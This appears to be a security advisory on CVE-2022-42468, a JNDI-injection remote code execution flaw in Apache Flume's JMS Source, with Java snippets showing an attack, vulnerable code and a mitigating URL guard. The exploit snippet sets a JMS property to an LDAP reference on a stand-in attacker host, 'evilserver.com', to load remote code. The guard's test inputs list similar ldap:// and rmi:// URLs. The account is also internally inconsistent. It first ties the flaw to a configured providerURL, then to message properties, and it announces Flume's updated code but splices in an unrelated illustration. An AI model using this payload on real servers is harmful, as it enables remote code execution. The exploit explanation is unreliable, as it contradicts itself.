A critical security vulnerability has been discovered in Apache Flume, a popular distributed log collection and aggregation system, which allows an attacker to remotely execute arbitrary code on the affected server. The vulnerability is present in Apache Flume versions 1.4.0 through 1.10.1 when a JMS Source is configured with an unsafe providerURL. A patch has been released that addresses the issue by restricting JNDI lookups to the java protocol or to names with no protocol at all.

Original References

Official Apache Flume CVE-2022-42468 Advisory: https://cwiki.apache.org/confluence/display/FLUME/%5BCVE-2022-42468%5D

GitHub commit fixing the issue: https://github.com/apache/flume/commit/cab3ba95cce507368e1dc01f1b2fb2c38d771da

Exploit Details

The exploit is triggered when an attacker sends a specially crafted JMS message to the affected Flume source containing an unsafe JNDI reference in the message's headers or properties. Upon receiving the malicious message, Flume follows the JNDI reference in an attempt to resolve the object, which ultimately leads to the execution of attacker-controlled code on the server.

A malicious JMS message is sent by the attacker:

// Malicious JMS message creation
// (session and producer are an already-open javax.jms.Session and MessageProducer)
Message attackMsg = session.createMessage();
attackMsg.setStringProperty("jndiLookupUrl", "ldap://evilserver.com/maliciousObject");
producer.send(attackMsg);

The vulnerable Flume JMS Source processes the message:

// Vulnerable Flume JMS Source code
import javax.jms.JMSException;
import javax.jms.Message;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import org.apache.flume.source.AbstractSource;

public class JMSSource extends AbstractSource {

    public void handleMessage(Message msg) throws JMSException, NamingException {
        // ... (omitted for brevity)

        // Unsafe JNDI lookup triggered by attacker's JMS message:
        // the lookup name is taken verbatim from the message, so any
        // protocol (ldap://, rmi://, ...) is handed straight to JNDI
        String jndiLookupUrl = msg.getStringProperty("jndiLookupUrl");
        InitialContext ctx = new InitialContext();
        Object obj = ctx.lookup(jndiLookupUrl);

        // ... (omitted for brevity)
    }
}

Mitigation

To protect your Apache Flume installation from this vulnerability, upgrade immediately to Flume version 1.10.2, which includes the fix for CVE-2022-42468. The patch enforces the use of the java protocol or no protocol for JNDI lookups, which blocks the remote code execution path described above. The updated code snippet in Flume:
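As an added illustration of the mitigation (this is not Flume's own patch, which is in the linked commit), the guard below accepts a JNDI name or providerURL only when it has no scheme or the java scheme, and refuses everything else before JNDI ever sees it; the class and method names are assumptions.

```java
import java.net.URI;
import java.net.URISyntaxException;
import javax.naming.Context;
import javax.naming.NamingException;

/** Guard for JNDI names and provider URLs: allow only "java:" or scheme-less names. */
public final class JndiUrlGuard {

    /** Returns true only if url has no scheme or the "java" scheme (case-insensitive). */
    public static boolean isAllowed(String url) {
        if (url == null || url.isEmpty()) {
            return true; // nothing that could be resolved remotely
        }
        final String scheme;
        try {
            scheme = new URI(url).getScheme();
        } catch (URISyntaxException e) {
            return false; // unparseable input is rejected rather than passed on to JNDI
        }
        return scheme == null || scheme.equalsIgnoreCase("java");
    }

    /** Wraps Context.lookup so a non-java protocol is refused before the lookup happens. */
    public static Object safeLookup(Context ctx, String name) throws NamingException {
        if (!isAllowed(name)) {
            throw new IllegalArgumentException("Refusing JNDI lookup of unsafe URL: " + name);
        }
        return ctx.lookup(name);
    }

    public static void main(String[] args) {
        // Constructed sample inputs for demonstration (not taken from the advisory)
        String[] samples = {
            "java:comp/env/jms/ConnectionFactory", // allow: java protocol
            "ConnectionFactory",                   // allow: no protocol
            "ldap://attacker.example/obj",         // reject: remote LDAP reference
            "rmi://attacker.example:1099/obj",     // reject: remote RMI reference
            "LDAP://attacker.example/obj",         // reject: scheme check is case-insensitive
            "ldap:",                               // reject: malformed URI
        };
        for (String s : samples) {
            System.out.println((isAllowed(s) ? "allow  " : "reject ") + s);
        }
    }
}
```

The same check belongs on the configured providerURL at source configuration time, so a bad value is refused at startup rather than at the first message.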

Timeline

Published on: 10/26/2022 16:15:00 UTC
Last modified on: 10/28/2022 17:41:00 UTC